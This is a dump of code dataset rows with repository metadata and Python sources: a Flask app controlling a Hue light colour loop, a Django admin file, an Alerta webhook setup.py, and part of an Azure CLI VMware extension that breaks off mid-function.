hexsha
stringlengths 40
40
| size
int64 7
1.04M
| ext
stringclasses 10
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 4
247
| max_stars_repo_name
stringlengths 4
125
| max_stars_repo_head_hexsha
stringlengths 40
78
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
368k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 4
247
| max_issues_repo_name
stringlengths 4
125
| max_issues_repo_head_hexsha
stringlengths 40
78
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
116k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 4
247
| max_forks_repo_name
stringlengths 4
125
| max_forks_repo_head_hexsha
stringlengths 40
78
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 1
1.04M
| avg_line_length
float64 1.77
618k
| max_line_length
int64 1
1.02M
| alphanum_fraction
float64 0
1
| original_content
stringlengths 7
1.04M
| filtered:remove_function_no_docstring
int64 -102
942k
| filtered:remove_class_no_docstring
int64 -354
977k
| filtered:remove_delete_markers
int64 0
60.1k
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
80bde51cbf5dacd747cbe696168d2b9360cef562
| 1,337
|
py
|
Python
|
Build Docker/code/main.py
|
AlexTheGeek/color-loop-hue
|
67266628c72cb48e6397596e1f98b46d8674f669
|
[
"MIT"
] | 2
|
2021-01-01T10:40:26.000Z
|
2021-02-20T09:39:22.000Z
|
Build Docker/code/main.py
|
AlexTheGeek/color-loop-hue
|
67266628c72cb48e6397596e1f98b46d8674f669
|
[
"MIT"
] | null | null | null |
Build Docker/code/main.py
|
AlexTheGeek/color-loop-hue
|
67266628c72cb48e6397596e1f98b46d8674f669
|
[
"MIT"
] | null | null | null |
#!/bin/python3
#Alexis Brunet alias AlexTheGeek
####################
## HUE COLOR LOOP ##
####################
import time
import os
import requests
from os.path import join, dirname
from dotenv import load_dotenv
from flask import Flask, render_template, request
app = Flask(__name__)
STARTING = '{"on":true,"bri":254,"xy":[0.3523,0.144],"effect":"colorloop"}'
ENDING = '{"effect": "none"}'
OFF = '{"on":false}'
env_path = join(dirname(__file__), 'env')
load_dotenv(env_path)
ip = os.getenv('IP')
api = os.getenv('API')
group = os.getenv('GROUP')
@app.route("/<deviceName>/")
if __name__ == "__main__":
app.run(host='0.0.0.0', port=8080)
| 27.854167
| 87
| 0.598355
|
#!/bin/python3
#Alexis Brunet alias AlexTheGeek
####################
## HUE COLOR LOOP ##
####################
import time
import os
import requests
from os.path import join, dirname
from dotenv import load_dotenv
from flask import Flask, render_template, request
app = Flask(__name__)
# Hue API JSON payloads sent to the bridge's group-action endpoint:
# start the colorloop effect at full brightness, stop the effect, power off.
STARTING = '{"on":true,"bri":254,"xy":[0.3523,0.144],"effect":"colorloop"}'
ENDING = '{"effect": "none"}'
OFF = '{"on":false}'
# Bridge connection settings are read from an 'env' file next to this script.
env_path = join(dirname(__file__), 'env')
load_dotenv(env_path)
ip = os.getenv('IP')  # Hue bridge IP address
api = os.getenv('API')  # Hue API username/token
group = os.getenv('GROUP')  # target light group id
def appel(data, grp):
    """Send a JSON action payload to the Hue bridge for light group *grp*.

    Issues a PUT to the bridge's group-action endpoint using the
    module-level ``ip`` and ``api`` values loaded from the env file.
    Returns the ``requests.Response`` so callers may inspect the result
    (previously the response was assigned to an unused local).
    """
    headers = {'Content-Type': 'application/json', }
    # A timeout keeps the Flask worker from hanging forever when the
    # bridge is unreachable — requests has no default timeout.
    return requests.put(
        'http://'+ip+'/api/'+api+'/groups/'+grp+'/action/',
        headers=headers, data=data, timeout=10)
@app.route("/<deviceName>/")
def action(deviceName):
    """Dispatch a color-loop command: 'start', 'stop' or 'off'.

    Any other device name (including the original 'monstermash' guard)
    previously fell through and returned None, which makes Flask raise a
    500; an explicit 404 is returned instead.
    """
    # Map each command to its bridge payload and the HTML label to show.
    commands = {
        'start': (STARTING, 'Color Loop START'),
        'stop': (ENDING, 'Color Loop STOP'),
        'off': (OFF, 'Color Loop TURN OFF'),
    }
    if deviceName in commands:
        data, label = commands[deviceName]
        appel(data, group)
        return '<h1>' + label + '</h1>', {'Content-Type': 'text/html'}
    return '<h1>Unknown command</h1>', 404, {'Content-Type': 'text/html'}
# Run the development server on all interfaces when executed directly.
if __name__ == "__main__":
    app.run(host='0.0.0.0', port=8080)
| 641
| 0
| 45
|
4e6123c1786b27aaf1d63c5382e320ef1dfeaffe
| 381
|
py
|
Python
|
django_extauth/admin.py
|
aiakos/aiakos
|
a591e7ef13ab9e8e14b4d3569d43fce694c4150a
|
[
"BSD-2-Clause",
"MIT"
] | 4
|
2017-04-28T19:09:17.000Z
|
2018-07-03T04:43:54.000Z
|
django_extauth/admin.py
|
aiakos/aiakos
|
a591e7ef13ab9e8e14b4d3569d43fce694c4150a
|
[
"BSD-2-Clause",
"MIT"
] | 2
|
2020-06-05T17:46:47.000Z
|
2021-06-10T17:22:58.000Z
|
django_extauth/admin.py
|
aiakos/aiakos
|
a591e7ef13ab9e8e14b4d3569d43fce694c4150a
|
[
"BSD-2-Clause",
"MIT"
] | 2
|
2017-08-14T07:15:14.000Z
|
2019-03-04T14:02:05.000Z
|
from django.contrib import admin
from .models import *
admin.site.register(IdentityProvider, IdentityProviderAdmin)
admin.site.register(ExternalIdentity, ExternalIdentityAdmin)
| 25.4
| 60
| 0.787402
|
from django.contrib import admin
from .models import *
class IdentityProviderAdmin(admin.ModelAdmin):
    """Django admin configuration for IdentityProvider records."""
    # Columns shown in the admin changelist view.
    list_display = ('domain', 'name', 'client_id', 'protocol')
admin.site.register(IdentityProvider, IdentityProviderAdmin)
class ExternalIdentityAdmin(admin.ModelAdmin):
    """Django admin configuration for ExternalIdentity records."""
    # Columns shown in the admin changelist view.
    list_display = ('user', 'provider', 'sub')
admin.site.register(ExternalIdentity, ExternalIdentityAdmin)
| 0
| 154
| 46
|
cc3464107c1563f46ae7232b9d85ad3af834a0f0
| 625
|
py
|
Python
|
webhooks/observium/setup.py
|
x3me/alerta-contrib
|
215bf1cffa6362a90edb6350a6dea37db6b18ab8
|
[
"MIT"
] | null | null | null |
webhooks/observium/setup.py
|
x3me/alerta-contrib
|
215bf1cffa6362a90edb6350a6dea37db6b18ab8
|
[
"MIT"
] | null | null | null |
webhooks/observium/setup.py
|
x3me/alerta-contrib
|
215bf1cffa6362a90edb6350a6dea37db6b18ab8
|
[
"MIT"
] | null | null | null |
from setuptools import setup, find_packages

# Package version for the alerta-observium webhook plugin.
version = '0.0.5'

setup(
    name="alerta-observium",
    version=version,
    # Fixed typo: "Obseervium" -> "Observium".
    description='Alerta webhook for Observium NMS',
    url='https://github.com/alerta/alerta-contrib',
    license='MIT',
    author='Iskren Hadzhinedev',
    author_email='iskren.hadzhinedev@x3me.net',
    packages=find_packages(),
    py_modules=['alerta_observium'],
    install_requires=[
        'python-dateutil'
    ],
    include_package_data=True,
    zip_safe=True,
    # Register the webhook with Alerta's plugin entry-point group.
    entry_points={
        'alerta.webhooks': [
            'observium = alerta_observium:ObserviumWebhook'
        ]
    }
)
| 24.038462
| 59
| 0.6576
|
from setuptools import setup, find_packages

# Package version for the alerta-observium webhook plugin.
version = '0.0.5'

setup(
    name="alerta-observium",
    version=version,
    # Fixed typo: "Obseervium" -> "Observium".
    description='Alerta webhook for Observium NMS',
    url='https://github.com/alerta/alerta-contrib',
    license='MIT',
    author='Iskren Hadzhinedev',
    author_email='iskren.hadzhinedev@x3me.net',
    packages=find_packages(),
    py_modules=['alerta_observium'],
    install_requires=[
        'python-dateutil'
    ],
    include_package_data=True,
    zip_safe=True,
    # Register the webhook with Alerta's plugin entry-point group.
    entry_points={
        'alerta.webhooks': [
            'observium = alerta_observium:ObserviumWebhook'
        ]
    }
)
| 0
| 0
| 0
|
db99afef5980354d5007694954a2c0c2e199a476
| 45,026
|
py
|
Python
|
src/vmware/azext_vmware/custom.py
|
Mossaka/azure-cli-extensions
|
f75f5d39d3b621fcbcdd50eddf378f3a49535ab0
|
[
"MIT"
] | null | null | null |
src/vmware/azext_vmware/custom.py
|
Mossaka/azure-cli-extensions
|
f75f5d39d3b621fcbcdd50eddf378f3a49535ab0
|
[
"MIT"
] | null | null | null |
src/vmware/azext_vmware/custom.py
|
Mossaka/azure-cli-extensions
|
f75f5d39d3b621fcbcdd50eddf378f3a49535ab0
|
[
"MIT"
] | null | null | null |
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# pylint: disable=line-too-long
from typing import List, Tuple
from azext_vmware.vendored_sdks.avs_client import AVSClient
LEGAL_TERMS = '''
LEGAL TERMS
Azure VMware Solution ("AVS") is an Azure Service licensed to you as part of your Azure subscription and subject to the terms and conditions of the agreement under which you obtained your Azure subscription (https://azure.microsoft.com/support/legal/). The following additional terms also apply to your use of AVS:
DATA RETENTION. AVS does not currently support retention or extraction of data stored in AVS Clusters. Once an AVS Cluster is deleted, the data cannot be recovered as it terminates all running workloads, components, and destroys all Cluster data and configuration settings, including public IP addresses.
PROFESSIONAL SERVICES DATA TRANSFER TO VMWARE. In the event that you contact Microsoft for technical support relating to Azure VMware Solution and Microsoft must engage VMware for assistance with the issue, Microsoft will transfer the Professional Services Data and the Personal Data contained in the support case to VMware. The transfer is made subject to the terms of the Support Transfer Agreement between VMware and Microsoft, which establishes Microsoft and VMware as independent processors of the Professional Services Data. Before any transfer of Professional Services Data to VMware will occur, Microsoft will obtain and record consent from you for the transfer.
VMWARE DATA PROCESSING AGREEMENT. Once Professional Services Data is transferred to VMware (pursuant to the above section), the processing of Professional Services Data, including the Personal Data contained the support case, by VMware as an independent processor will be governed by the VMware Data Processing Agreement for Microsoft AVS Customers Transferred for L3 Support (the "VMware Data Processing Agreement") between you and VMware (located at https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/privacy/vmware-data-processing-agreement.pdf). You also give authorization to allow your representative(s) who request technical support for Azure VMware Solution to provide consent on your behalf to Microsoft for the transfer of the Professional Services Data to VMware.
ACCEPTANCE OF LEGAL TERMS. By continuing, you agree to the above additional Legal Terms for AVS. If you are an individual accepting these terms on behalf of an entity, you also represent that you have the legal authority to enter into these additional terms on that entity's behalf.
'''
| 71.469841
| 789
| 0.848043
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# pylint: disable=line-too-long
from typing import List, Tuple
from azext_vmware.vendored_sdks.avs_client import AVSClient
LEGAL_TERMS = '''
LEGAL TERMS
Azure VMware Solution ("AVS") is an Azure Service licensed to you as part of your Azure subscription and subject to the terms and conditions of the agreement under which you obtained your Azure subscription (https://azure.microsoft.com/support/legal/). The following additional terms also apply to your use of AVS:
DATA RETENTION. AVS does not currently support retention or extraction of data stored in AVS Clusters. Once an AVS Cluster is deleted, the data cannot be recovered as it terminates all running workloads, components, and destroys all Cluster data and configuration settings, including public IP addresses.
PROFESSIONAL SERVICES DATA TRANSFER TO VMWARE. In the event that you contact Microsoft for technical support relating to Azure VMware Solution and Microsoft must engage VMware for assistance with the issue, Microsoft will transfer the Professional Services Data and the Personal Data contained in the support case to VMware. The transfer is made subject to the terms of the Support Transfer Agreement between VMware and Microsoft, which establishes Microsoft and VMware as independent processors of the Professional Services Data. Before any transfer of Professional Services Data to VMware will occur, Microsoft will obtain and record consent from you for the transfer.
VMWARE DATA PROCESSING AGREEMENT. Once Professional Services Data is transferred to VMware (pursuant to the above section), the processing of Professional Services Data, including the Personal Data contained the support case, by VMware as an independent processor will be governed by the VMware Data Processing Agreement for Microsoft AVS Customers Transferred for L3 Support (the "VMware Data Processing Agreement") between you and VMware (located at https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/privacy/vmware-data-processing-agreement.pdf). You also give authorization to allow your representative(s) who request technical support for Azure VMware Solution to provide consent on your behalf to Microsoft for the transfer of the Professional Services Data to VMware.
ACCEPTANCE OF LEGAL TERMS. By continuing, you agree to the above additional Legal Terms for AVS. If you are an individual accepting these terms on behalf of an entity, you also represent that you have the legal authority to enter into these additional terms on that entity's behalf.
'''
def privatecloud_list(client: AVSClient, resource_group_name=None):
    """List private clouds — within one resource group if given, else subscription-wide."""
    if resource_group_name is not None:
        return client.private_clouds.list(resource_group_name)
    return client.private_clouds.list_in_subscription()
def privatecloud_show(client: AVSClient, resource_group_name, name):
    """Return a single private cloud by resource group and name."""
    return client.private_clouds.get(resource_group_name, name)
def privatecloud_create(client: AVSClient, resource_group_name, name, sku, cluster_size, network_block, location=None, internet=None, vcenter_password=None, nsxt_password=None, tags=None, accept_eula=False, mi_system_assigned=False):
    """Create an AVS private cloud after the caller accepts the legal terms.

    Prompts interactively for EULA acceptance unless ``accept_eula`` is set;
    returns None if the user declines, otherwise the long-running
    create-or-update poller.
    """
    from knack.prompting import prompt_y_n
    if not accept_eula:
        print(LEGAL_TERMS)
        msg = 'Do you agree to the above additional terms for AVS?'
        if not prompt_y_n(msg, default="n"):
            return None
    from azext_vmware.vendored_sdks.avs_client.models import PrivateCloud, Circuit, ManagementCluster, Sku, PrivateCloudIdentity
    # BUG FIX: the keyword was misspelled 'ciruit', so the Circuit object was
    # presumably never attached to the model (msrest constructors take keyword
    # args by declared name) — corrected to 'circuit'.
    cloud = PrivateCloud(sku=Sku(name=sku), circuit=Circuit(), management_cluster=ManagementCluster(cluster_size=cluster_size), network_block=network_block)
    # Optional properties are only set when supplied so service defaults apply.
    if location is not None:
        cloud.location = location
    if tags is not None:
        cloud.tags = tags
    if mi_system_assigned:
        cloud.identity = PrivateCloudIdentity(type='SystemAssigned')
    if internet is not None:
        cloud.internet = internet
    if vcenter_password is not None:
        cloud.vcenter_password = vcenter_password
    if nsxt_password is not None:
        cloud.nsxt_password = nsxt_password
    return client.private_clouds.begin_create_or_update(resource_group_name, name, cloud)
def privatecloud_update(client: AVSClient, resource_group_name, name, cluster_size=None, internet=None, tags=None):
    """Patch mutable private-cloud properties; only supplied fields are sent."""
    from azext_vmware.vendored_sdks.avs_client.models import PrivateCloudUpdate, ManagementCluster
    private_cloud_update = PrivateCloudUpdate()
    if tags is not None:
        private_cloud_update.tags = tags
    if cluster_size is not None:
        private_cloud_update.management_cluster = ManagementCluster(cluster_size=cluster_size)
    if internet is not None:
        private_cloud_update.internet = internet
    return client.private_clouds.begin_update(resource_group_name, name, private_cloud_update)
def privatecloud_delete(client: AVSClient, resource_group_name, name, yes=False):
    """Delete a private cloud after interactive confirmation (skipped when yes=True)."""
    from knack.prompting import prompt_y_n
    msg = 'This will delete the private cloud. Are you sure?'
    if not yes and not prompt_y_n(msg, default="n"):
        return None
    return client.private_clouds.begin_delete(resource_group_name, name)
def privatecloud_listadmincredentials(client: AVSClient, resource_group_name, private_cloud):
    """Return the admin credentials for a private cloud."""
    return client.private_clouds.list_admin_credentials(resource_group_name=resource_group_name, private_cloud_name=private_cloud)
def privatecloud_addidentitysource(client: AVSClient, resource_group_name, name, private_cloud, alias, domain, base_user_dn, base_group_dn, primary_server, username, password, secondary_server=None, ssl="Disabled"):
    """Append an LDAP identity source to a private cloud and push the update."""
    from azext_vmware.vendored_sdks.avs_client.models import IdentitySource
    pc = client.private_clouds.get(resource_group_name, private_cloud)
    identitysource = IdentitySource(name=name, alias=alias, domain=domain, base_user_dn=base_user_dn, base_group_dn=base_group_dn, primary_server=primary_server, ssl=ssl, username=username, password=password)
    if secondary_server is not None:
        identitysource.secondary_server = secondary_server
    pc.identity_sources.append(identitysource)
    return client.private_clouds.begin_create_or_update(resource_group_name=resource_group_name, private_cloud_name=private_cloud, private_cloud=pc)
def privatecloud_deleteidentitysource(client: AVSClient, resource_group_name, name, private_cloud, alias, domain):
    """Remove the identity source matching name/alias/domain.

    Returns the update poller when a match is removed; otherwise returns the
    unchanged private cloud object without calling the service again.
    """
    pc = client.private_clouds.get(resource_group_name, private_cloud)
    found = next((ids for ids in pc.identity_sources
                 if ids.name == name and ids.alias == alias and ids.domain == domain), None)
    if found:
        pc.identity_sources.remove(found)
        return client.private_clouds.begin_create_or_update(resource_group_name=resource_group_name, private_cloud_name=private_cloud, private_cloud=pc)
    return pc
def privatecloud_addavailabilityzone(client: AVSClient, resource_group_name, private_cloud, strategy=None, zone=None, secondary_zone=None):
    """Set the availability configuration on a private cloud."""
    from azext_vmware.vendored_sdks.avs_client.models import AvailabilityProperties, PrivateCloudUpdate
    pc = PrivateCloudUpdate()
    pc.availability = AvailabilityProperties(strategy=strategy, zone=zone, secondary_zone=secondary_zone)
    return client.private_clouds.begin_update(resource_group_name=resource_group_name, private_cloud_name=private_cloud, private_cloud_update=pc)
def privatecloud_deleteavailabilityzone(client: AVSClient, resource_group_name, private_cloud):
    """Clear the availability configuration on a private cloud."""
    from azext_vmware.vendored_sdks.avs_client.models import PrivateCloudUpdate
    pc = PrivateCloudUpdate()
    pc.availability = None
    return client.private_clouds.begin_update(resource_group_name=resource_group_name, private_cloud_name=private_cloud, private_cloud_update=pc)
def privatecloud_addcmkencryption(client: AVSClient, resource_group_name, private_cloud, enc_status=None, enc_kv_key_name=None, enc_kv_key_version=None, enc_kv_url=None):
    """Enable customer-managed-key encryption with the given Key Vault settings."""
    from azext_vmware.vendored_sdks.avs_client.models import Encryption, EncryptionKeyVaultProperties, PrivateCloudUpdate
    pc = PrivateCloudUpdate()
    pc.encryption = Encryption(status=enc_status, key_vault_properties=EncryptionKeyVaultProperties(key_name=enc_kv_key_name, key_version=enc_kv_key_version, key_vault_url=enc_kv_url))
    return client.private_clouds.begin_update(resource_group_name=resource_group_name, private_cloud_name=private_cloud, private_cloud_update=pc)
def privatecloud_deletecmkenryption(client: AVSClient, resource_group_name, private_cloud):
    """Clear customer-managed-key encryption.

    NOTE(review): function name is misspelled ('enryption'); it is likely
    wired into the CLI command table by this name, so renaming would break
    callers — confirm before fixing.
    """
    from azext_vmware.vendored_sdks.avs_client.models import PrivateCloudUpdate
    pc = PrivateCloudUpdate()
    pc.encryption = None
    return client.private_clouds.begin_update(resource_group_name=resource_group_name, private_cloud_name=private_cloud, private_cloud_update=pc)
def privatecloud_identity_assign(client: AVSClient, resource_group_name, private_cloud, system_assigned=False):
    """Assign a system-assigned managed identity to a private cloud.

    When system_assigned is False the update payload carries no identity,
    so the call is effectively a no-op update.
    """
    from azext_vmware.vendored_sdks.avs_client.models import PrivateCloudIdentity, PrivateCloudUpdate
    pc = PrivateCloudUpdate()
    if system_assigned:
        pc.identity = PrivateCloudIdentity(type="SystemAssigned")
    return client.private_clouds.begin_update(resource_group_name=resource_group_name, private_cloud_name=private_cloud, private_cloud_update=pc)
def privatecloud_identity_remove(client: AVSClient, resource_group_name, private_cloud):
    """Remove the managed identity by sending an identity with type=None."""
    from azext_vmware.vendored_sdks.avs_client.models import PrivateCloudIdentity, PrivateCloudUpdate
    pc = PrivateCloudUpdate()
    pc.identity = PrivateCloudIdentity(type=None)
    return client.private_clouds.begin_update(resource_group_name=resource_group_name, private_cloud_name=private_cloud, private_cloud_update=pc)
def privatecloud_identity_get(client: AVSClient, resource_group_name, private_cloud):
    """Return only the identity block of a private cloud."""
    return client.private_clouds.get(resource_group_name, private_cloud).identity
def privatecloud_rotate_vcenter_password(client: AVSClient, resource_group_name, private_cloud):
    """Start rotation of the vCenter admin password (long-running operation)."""
    return client.private_clouds.begin_rotate_vcenter_password(resource_group_name=resource_group_name, private_cloud_name=private_cloud)
def privatecloud_rotate_nsxt_password(client: AVSClient, resource_group_name, private_cloud):
    """Start rotation of the NSX-T admin password (long-running operation)."""
    return client.private_clouds.begin_rotate_nsxt_password(resource_group_name=resource_group_name, private_cloud_name=private_cloud)
def cluster_create(client: AVSClient, resource_group_name, name, sku, private_cloud, size, hosts):
    """Create a cluster in a private cloud (long-running operation)."""
    from azext_vmware.vendored_sdks.avs_client.models import Sku, Cluster
    return client.clusters.begin_create_or_update(resource_group_name=resource_group_name, private_cloud_name=private_cloud, cluster_name=name, cluster=Cluster(sku=Sku(name=sku), cluster_size=size, hosts=hosts))
def cluster_update(client: AVSClient, resource_group_name, name, private_cloud, size=None, hosts=None):
    """Update a cluster's size and/or host list."""
    return client.clusters.begin_update(resource_group_name=resource_group_name, private_cloud_name=private_cloud, cluster_name=name, cluster_size=size, hosts=hosts)
def cluster_list(client: AVSClient, resource_group_name, private_cloud):
    """List clusters in a private cloud."""
    return client.clusters.list(resource_group_name=resource_group_name, private_cloud_name=private_cloud)
def cluster_show(client: AVSClient, resource_group_name, private_cloud, name):
    """Return a single cluster by name."""
    return client.clusters.get(resource_group_name=resource_group_name, private_cloud_name=private_cloud, cluster_name=name)
def cluster_delete(client: AVSClient, resource_group_name, private_cloud, name):
    """Delete a cluster (long-running operation)."""
    return client.clusters.begin_delete(resource_group_name=resource_group_name, private_cloud_name=private_cloud, cluster_name=name)
def check_quota_availability(client: AVSClient, location):
    """Check AVS quota availability for a location."""
    return client.locations.check_quota_availability(location)
def check_trial_availability(client: AVSClient, location):
    """Check AVS trial availability for a location."""
    return client.locations.check_trial_availability(location)
def authorization_create(client: AVSClient, resource_group_name, private_cloud, name):
    """Create an ExpressRoute authorization for a private cloud."""
    return client.authorizations.begin_create_or_update(resource_group_name=resource_group_name, private_cloud_name=private_cloud, authorization_name=name)
def authorization_list(client: AVSClient, resource_group_name, private_cloud):
    """List ExpressRoute authorizations for a private cloud."""
    return client.authorizations.list(resource_group_name=resource_group_name, private_cloud_name=private_cloud)
def authorization_show(client: AVSClient, resource_group_name, private_cloud, name):
    """Return a single ExpressRoute authorization by name."""
    return client.authorizations.get(resource_group_name=resource_group_name, private_cloud_name=private_cloud, authorization_name=name)
def authorization_delete(client: AVSClient, resource_group_name, private_cloud, name):
    """Delete an ExpressRoute authorization (long-running operation)."""
    return client.authorizations.begin_delete(resource_group_name=resource_group_name, private_cloud_name=private_cloud, authorization_name=name)
def hcxenterprisesite_create(client: AVSClient, resource_group_name, private_cloud, name):
    """Create an HCX Enterprise Site in a private cloud."""
    return client.hcx_enterprise_sites.create_or_update(resource_group_name=resource_group_name, private_cloud_name=private_cloud, hcx_enterprise_site_name=name)
def hcxenterprisesite_list(client: AVSClient, resource_group_name, private_cloud):
    """List HCX Enterprise Sites in a private cloud."""
    return client.hcx_enterprise_sites.list(resource_group_name=resource_group_name, private_cloud_name=private_cloud)
def hcxenterprisesite_show(client: AVSClient, resource_group_name, private_cloud, name):
    """Return a single HCX Enterprise Site by name."""
    return client.hcx_enterprise_sites.get(resource_group_name=resource_group_name, private_cloud_name=private_cloud, hcx_enterprise_site_name=name)
def hcxenterprisesite_delete(client: AVSClient, resource_group_name, private_cloud, name):
    """Delete an HCX Enterprise Site."""
    return client.hcx_enterprise_sites.delete(resource_group_name=resource_group_name, private_cloud_name=private_cloud, hcx_enterprise_site_name=name)
def datastore_create():
    """Deprecated entry point: directs the user to the volume-specific commands."""
    print('Please use "az vmware datastore netapp-volume create" or "az vmware datastore disk-pool-volume create" instead.')
def datastore_netappvolume_create(client: AVSClient, resource_group_name, private_cloud, cluster, name, volume_id):
    """Create a datastore backed by an Azure NetApp Files volume."""
    from azext_vmware.vendored_sdks.avs_client.models import NetAppVolume
    net_app_volume = NetAppVolume(id=volume_id)
    return client.datastores.begin_create_or_update(resource_group_name=resource_group_name, private_cloud_name=private_cloud, cluster_name=cluster, datastore_name=name, net_app_volume=net_app_volume, disk_pool_volume=None)
def datastore_diskpoolvolume_create(client: AVSClient, resource_group_name, private_cloud, cluster, name, target_id, lun_name, mount_option="MOUNT", path=None):
    """Create a datastore backed by a disk-pool iSCSI volume."""
    from azext_vmware.vendored_sdks.avs_client.models import DiskPoolVolume
    disk_pool_volume = DiskPoolVolume(target_id=target_id, lun_name=lun_name, mount_option=mount_option, path=path)
    return client.datastores.begin_create_or_update(resource_group_name=resource_group_name, private_cloud_name=private_cloud, cluster_name=cluster, datastore_name=name, net_app_volume=None, disk_pool_volume=disk_pool_volume)
def datastore_list(client: AVSClient, resource_group_name, private_cloud, cluster):
    """List datastores in a cluster."""
    return client.datastores.list(resource_group_name=resource_group_name, private_cloud_name=private_cloud, cluster_name=cluster)
def datastore_show(client: AVSClient, resource_group_name, private_cloud, cluster, name):
    """Return a single datastore by name."""
    return client.datastores.get(resource_group_name=resource_group_name, private_cloud_name=private_cloud, cluster_name=cluster, datastore_name=name)
def datastore_delete(client: AVSClient, resource_group_name, private_cloud, cluster, name):
    """Delete a datastore (long-running operation)."""
    return client.datastores.begin_delete(resource_group_name=resource_group_name, private_cloud_name=private_cloud, cluster_name=cluster, datastore_name=name)
def addon_list(client: AVSClient, resource_group_name, private_cloud):
    """List addons installed on a private cloud."""
    return client.addons.list(resource_group_name=resource_group_name, private_cloud_name=private_cloud)
def addon_vr_create(client: AVSClient, resource_group_name, private_cloud, vrs_count: int):
    """Install the vSphere Replication (VR) addon with the given VRS count."""
    from azext_vmware.vendored_sdks.avs_client.models import AddonVrProperties
    properties = AddonVrProperties(vrs_count=vrs_count)
    return client.addons.begin_create_or_update(resource_group_name=resource_group_name, private_cloud_name=private_cloud, addon_name="vr", properties=properties)
def addon_hcx_create(client: AVSClient, resource_group_name, private_cloud, offer: str):
    """Install the HCX addon with the given offer."""
    from azext_vmware.vendored_sdks.avs_client.models import AddonHcxProperties
    properties = AddonHcxProperties(offer=offer)
    return client.addons.begin_create_or_update(resource_group_name=resource_group_name, private_cloud_name=private_cloud, addon_name="hcx", properties=properties)
def addon_srm_create(client: AVSClient, resource_group_name, private_cloud, license_key: str):
    """Install the Site Recovery Manager (SRM) addon with the given license key."""
    from azext_vmware.vendored_sdks.avs_client.models import AddonSrmProperties
    properties = AddonSrmProperties(license_key=license_key)
    return client.addons.begin_create_or_update(resource_group_name=resource_group_name, private_cloud_name=private_cloud, addon_name="srm", properties=properties)
def addon_vr_show(client: AVSClient, resource_group_name, private_cloud):
    """Return the VR addon."""
    return client.addons.get(resource_group_name=resource_group_name, private_cloud_name=private_cloud, addon_name="vr")
def addon_hcx_show(client: AVSClient, resource_group_name, private_cloud):
    """Return the HCX addon."""
    return client.addons.get(resource_group_name=resource_group_name, private_cloud_name=private_cloud, addon_name="hcx")
def addon_srm_show(client: AVSClient, resource_group_name, private_cloud):
    """Return the SRM addon."""
    return client.addons.get(resource_group_name=resource_group_name, private_cloud_name=private_cloud, addon_name="srm")
def addon_vr_update(client: AVSClient, resource_group_name, private_cloud, vrs_count: int):
    """Update the VR addon; body is identical to addon_vr_create (same PUT API)."""
    from azext_vmware.vendored_sdks.avs_client.models import AddonVrProperties
    properties = AddonVrProperties(vrs_count=vrs_count)
    return client.addons.begin_create_or_update(resource_group_name=resource_group_name, private_cloud_name=private_cloud, addon_name="vr", properties=properties)
def addon_hcx_update(client: AVSClient, resource_group_name, private_cloud, offer: str):
    """Update the HCX addon; body is identical to addon_hcx_create (same PUT API)."""
    from azext_vmware.vendored_sdks.avs_client.models import AddonHcxProperties
    properties = AddonHcxProperties(offer=offer)
    return client.addons.begin_create_or_update(resource_group_name=resource_group_name, private_cloud_name=private_cloud, addon_name="hcx", properties=properties)
def addon_srm_update(client: AVSClient, resource_group_name, private_cloud, license_key: str):
    """Update the SRM addon; body is identical to addon_srm_create (same PUT API)."""
    from azext_vmware.vendored_sdks.avs_client.models import AddonSrmProperties
    properties = AddonSrmProperties(license_key=license_key)
    return client.addons.begin_create_or_update(resource_group_name=resource_group_name, private_cloud_name=private_cloud, addon_name="srm", properties=properties)
def addon_vr_delete(client: AVSClient, resource_group_name, private_cloud):
    """Uninstall the VR addon (long-running operation)."""
    return client.addons.begin_delete(resource_group_name=resource_group_name, private_cloud_name=private_cloud, addon_name="vr")
def addon_hcx_delete(client: AVSClient, resource_group_name, private_cloud):
    """Uninstall the HCX addon (long-running operation)."""
    return client.addons.begin_delete(resource_group_name=resource_group_name, private_cloud_name=private_cloud, addon_name="hcx")
def addon_srm_delete(client: AVSClient, resource_group_name, private_cloud):
    """Uninstall the SRM addon (long-running operation)."""
    return client.addons.begin_delete(resource_group_name=resource_group_name, private_cloud_name=private_cloud, addon_name="srm")
def globalreachconnection_create(client: AVSClient, resource_group_name, private_cloud, name, authorization_key=None, peer_express_route_circuit=None, express_route_id=None):
    """Create a Global Reach connection between ExpressRoute circuits."""
    from azext_vmware.vendored_sdks.avs_client.models import GlobalReachConnection
    return client.global_reach_connections.begin_create_or_update(resource_group_name=resource_group_name, private_cloud_name=private_cloud, global_reach_connection_name=name, global_reach_connection=GlobalReachConnection(authorization_key=authorization_key, peer_express_route_circuit=peer_express_route_circuit, express_route_id=express_route_id))
def globalreachconnection_list(client: AVSClient, resource_group_name, private_cloud):
    """List Global Reach connections for a private cloud."""
    return client.global_reach_connections.list(resource_group_name=resource_group_name, private_cloud_name=private_cloud)
def globalreachconnection_show(client: AVSClient, resource_group_name, private_cloud, name):
    """Return a single Global Reach connection by name."""
    return client.global_reach_connections.get(resource_group_name=resource_group_name, private_cloud_name=private_cloud, global_reach_connection_name=name)
def globalreachconnection_delete(client: AVSClient, resource_group_name, private_cloud, name):
    """Delete a Global Reach connection (long-running operation)."""
